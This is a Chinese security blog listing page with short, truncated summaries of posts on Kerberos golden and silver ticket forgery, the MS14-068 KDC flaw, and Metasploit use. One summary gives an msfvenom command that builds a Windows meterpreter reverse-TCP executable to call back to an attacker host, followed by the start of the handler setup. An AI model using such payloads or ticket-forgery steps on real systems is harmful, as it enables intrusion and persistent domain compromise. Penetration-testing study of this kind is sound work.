摘要：黄金票据是伪造 TGT，白银票据（Silver Ticket）是伪造 ST(Service Ticket)，因为它不想黄金票据一样使用krgtgt账户的hash，而是使用计算机账户的hash进行加密的，所以只能获访问指定的权限。前提条件：域名称、域SID、域服务账户的hash、伪造的用户名（任意用户 阅读全文

摘要：黄金票据（Golden Ticket）是有效的 TGT(TicketGranting Ticket)票据，是由 kerberos账户（krbtgt）加密的。然而krbtgt仅在域控上才用，意味着你已经拿到了域控，用于域控权限掉后，想再重新获取。因为域控的密码可能更改， 通常 kbrtgt 账户不会有 阅读全文

摘要：MS14-068是密钥分发中心（KDC）服务中的Windows漏洞。它允许经过身份验证的用户在其Kerberos票证（TGT）中插入任意PAC（表示所有用户权限的结构）。该漏洞位于kdcsvc.dll域控制器的密钥分发中心(KDC)中。用户可以通过呈现具有改变的PAC的Kerberos TGT来获得 阅读全文

摘要：被控端生成：msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.5.139 LPORT=2345 -f exe > /root/yangtest.exe msf配置如下当被控端运行后即可上线：msf5 > use exploit/mul 阅读全文

摘要：报错如下： [*] Bundler failed to load and returned this error: 'cannot load such file -- bundler/setup'[*] You may need to uninstall or upgrade bundler 解决如 阅读全文

摘要：整理不易，转载请加原文链接：https://www.cnblogs.com/Yang34/p/12343672.html 补充下msf与数据库连接 结合nmap如下： 发现内网服务 use auxiliary/scanner/http/http_version 发现http服务 use auxili 阅读全文